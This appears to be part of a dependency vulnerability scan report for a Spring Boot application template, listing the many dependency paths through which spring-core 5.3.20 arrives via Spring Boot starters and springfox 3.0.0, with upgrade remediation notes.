  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
